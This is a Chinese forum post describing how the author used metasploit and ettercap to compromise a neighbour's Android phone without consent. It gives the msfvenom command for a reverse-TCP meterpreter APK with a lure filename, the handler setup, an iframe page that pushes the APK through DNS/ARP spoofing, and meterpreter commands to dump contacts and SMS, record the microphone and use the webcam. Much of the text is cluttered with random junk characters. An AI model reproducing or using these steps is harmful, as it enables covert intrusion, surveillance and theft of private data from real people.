metasploit+ettercap中间人攻击成功入侵邻居手机

admin · 发表于 2018-10-20 20:30:37

+ ^1 w) e& i0 V( I 五、msf+ettercap入侵邻居安卓手机 3 g) q# _& N) c8 V0 C' u4 z0 R* S D

8 M+ W( }6 W7 ]4 F& S T- N 首先启动msf 5 G7 _$ J6 r; z% {8 N3 ~5 |4 u3 Z; \

& I/ G- `5 l4 K4 W 先用kali生成一个安卓木马，如下命令： " \1 T4 j1 z* G' |

. n4 J: @- W# F2 L) \+ s Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 7 z% a0 n: N! [+ _1 B; a

2 ^/ N- }! I- S( Z+ h: y& z 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”，就不适用替换下载的方法了，据我所知，邻居频繁使用手机浏览器浏览新闻 ! Y6 Q5 Y# ~$ A# V. Z: z0 K, Z

Y+ J/ N. a# B+ Y |' d; V+ j, D( ] 然后进入msf - D/ B7 ]- e3 G7 p

0 C- _; N& o7 J# U) `& A use exploit/multi/handler & [) f- g. P) y) K4 M0 K

! v7 ]2 s; C: Z" o set payload android/meterpreter/reverse_tcp * x% \: s) G3 F

9 c7 C" y# x u I0 Z set LHOST 192.168.0.109 //ip为kaili的ip & o; {* h( n, b T/ v: X) T, Y; u

+ T$ s1 N ]0 t6 `; Z. f set LPORT 44444 //端口一定要与前面生成的木马的端口一致 V" ~& L, d7 I* M/ }2 X

# l9 _3 z0 z @ Exploit 2 f- L& i0 g4 z* m& I

# y/ T: H& U8 J1 ~% y* y; V) c / p( D, G$ d: o: J! F$ r. | z8 N

, q- J" t, Q6 S+ u5 G( s; ` 下面我们开启ettercap -G ' {' l$ t6 E/ A3 n

% G4 F+ Z9 t8 }/ ?# l. M 我物理IP为 x2 i, J- q$ c2 a- O+ h5 o

# t: S+ j9 T: y3 N2 }; b ; C. I1 T' z( b3 O8 L( A

8 \9 |8 E s" d9 Z% H 别到时候再把我物理机欺骗了，之前测试物理机只装腾讯管家是可以成功欺骗的， 4 ~8 m! D/ I n; B! e8 D, X

* E. L K0 {+ C1 G0 a. ~6 o 下面我们来设置一下 ; t; d( z7 q+ [$ ]6 T5 H; y

' [+ u& [/ y) e ! r+ t1 O9 S- ]) \' L% B) V

7 s4 k' w ?5 F 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下，并创建一个index.htm文件内容为：<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载，用iframe语句就OK了， ' r! A9 N; b; L! r! X+ g

& u1 J \0 |- |* d * U4 B2 j7 m8 r: L" k: {/ M

$ G" W- c |/ `8 z) ]: M Z2 z4 o3 h % @8 J. u) q& I. n( h

0 |' v, ?9 x h) r 6 P6 M6 `3 G/ B6 `: c8 b

' i; s; i3 X. I . f- X- ?) b% ?

# {7 u1 c7 a; J( v1 l5 } 2 j. k' g3 P! y) D

% d2 j3 z Z& o% f; P9 r0 q9 } ! D/ H5 c( A$ M9 B6 J" H7 X r8 H

+ S- J( ~! N+ u / Q9 T- `8 v3 U

- B4 i% X. R' ?% f H S% T% B7 L+ t - H+ w0 j/ ]- I7 y3 ^! g# _. o

. u# ~2 ?$ h* k8 ?( \: h/ G 0 D/ c. {+ r6 h, k! V

5 K) j$ H4 W% ]' i ' M0 c. D6 {: s& o

$ ], ]$ {& d B3 A% T 7 i& C0 r3 K1 c& W& b6 I4 b

- t9 e1 x. w2 B' y # ^% {$ B) C% P- B+ k; i; F. a

/ H. d7 B7 j- o ( _: |+ _( u' `5 `, p

& h) I# z4 \7 [$ K 下面我们开始攻击 % e5 J; m. h- T$ D* Q2 q

U3 t4 k& r# \% S7 }$ A % m$ T( `$ F1 [3 ]6 V

5 W9 \1 ]( @: ]: k+ } z2 B - F% B( {7 z5 I' A* ~

7 |5 v: i7 P4 |/ r$ L! k1 D6 M ; R5 X& `" e0 ^; f& h

0 H( P, ?% s. I' ^) } 9 I ?, d8 M" p7 ~0 D: E$ [

' P5 }- I! m/ a( |0 a$ B. C3 ? d6 U) A* R* A+ T

& a3 z0 L( O/ M( P% l+ y! g 大概过了5分钟多，发现反弹成功了 6 g3 ]0 }+ G- f* b& C2 w3 \

- c- h6 i. c& ~+ y6 h( u , @, S+ D, w& w0 V

8 i2 b/ {. N+ u# r4 }# W9 C3 a ~2 e2 y8 s$ h( a

, o9 _* S. O% q 2 u& B m/ _/ t6 c" D8 w

( `5 ~& D& k0 e: z; {) _ 6 s. t8 W7 X& x: b+ m# `

! b4 W, m# i$ {. x/ T* Z : \7 q/ t8 I x

) S& z! o- x) j9 Q8 m i# { 5 ~0 E" `8 T8 P

- |% h2 R9 Z! Q- m: p- p ) Y! }+ y( {2 I; h. x# z5 F

! Y, T& _6 n' ^1 g, M 执行命令 - z& ?* g4 W( R I z8 @2 f

1 ]8 w. x, N& X6 K4 n8 G0 d. z 7 `8 i) N9 a' R1 |) W+ o

4 o0 _) S8 x& U; H X! U dump_contacts --》这个是导出电话 0 t7 G$ k1 y, ~( Q- | h

: d4 `4 N7 }0 Y3 j; i- ?' Q$ k4 E$ _ dump_sms --》这个是导出信息 + t/ T2 i: K) M% c9 H& f

' A8 j0 ^! p! \# t record_mic Record audio from the default microphone for X seconds 9 H! }0 C r9 D+ Y/ Y" X

4 T4 U: X+ r5 }, K webcam_chat Start a video chat ) n9 g5 Y9 z) H$ v o7 k! K+ p l* x

& B& O6 M, v( B! P webcam_list List webcams : ]. D* c3 i! C3 w, p

- O. o4 S- x2 I* F. [: m$ G& s webcam_snap Take a snapshot from the specified webcam $ R! R; l/ Y6 E9 y2 `7 l

2 n5 t, k, R- C% c webcam_stream lay a video stream from the specified webcam . A& f' O+ v/ V3 r( u! u& _

# r9 ? R `7 J' q2 i! { J 2 G8 x& W/ u( Y% U

' y! Z- E) x, l 5 d% ?+ @0 N; u* n! v

. [& Q) N2 W- |, i3 s 我们打开看一下电话薄， 0 X+ _/ K' |+ B

0 M5 P, R7 f# V- b& }+ z# Y 6 T0 d! y* E- J/ D) I; J

( G; v# R, Y! `6 W& F1 I, v# k 0 m4 |5 V1 ^6 a( F* k7 ]0 m3 I4 W

- R$ w" A5 ~ g" a7 z3 B / O7 G/ O9 r! z& i/ Y+ z7 I$ Z, _* f

6 E; l# h5 d1 R5 R6 O1 q) K 1 N- B( b( @) P! O+ Y2 w% I

/ F- _& V: i4 S8 z$ `1 M- c c4 x; N7 R8 D9 w! T

; f, o1 n3 @; V f7 |% W * ?# v8 a# e# u9 T" U' S

6 w- f* c+ X" ^9 a$ @* F- J- G( M2 n 我们同时欺骗成DroidJack木马，使用方法如图： 0 a+ c/ O4 l }# W2 R. U! r. Y

, a2 f4 ?7 b0 a5 F0 e( r ! ^) y6 H' o& |0 T" C' I

3 ]0 c- U& v( n; M$ K$ y z! S2 s + ]+ Y( g2 H) N1 ]5 }

, j" L3 w. u. `1 A % E+ X ?5 X6 ^: E T

7 m% b9 e9 P0 M* e4 b3 S. n+ z 切记在前面生成完马以后记得在这里选择开关为on，并且对应前面生成马的时候的端口 ' z& D( V3 u; F3 j' e C

3 Y$ f7 ]& h! R- y # V- V( ~9 a" u2 q0 j4 ^; |: j# s

3 E% P) [" l' x7 W/ K, p! x' ?( d 2 o E# W( y; ~& i% H

4 B+ l+ L" X3 G$ L9 l) N2 C! g3 w$ V( j * t' L# u! ^$ S" x7 a

* Z, q# ~- C1 Q4 @ $ _/ X- S; I h- J* b

/ n+ L6 {! n7 Y5 x9 }
" z) M* U5 W# Y+ k

		自动登录	找回密码
密码			立即注册

metasploit+ettercap中间人攻击成功入侵邻居手机

浏览过的版块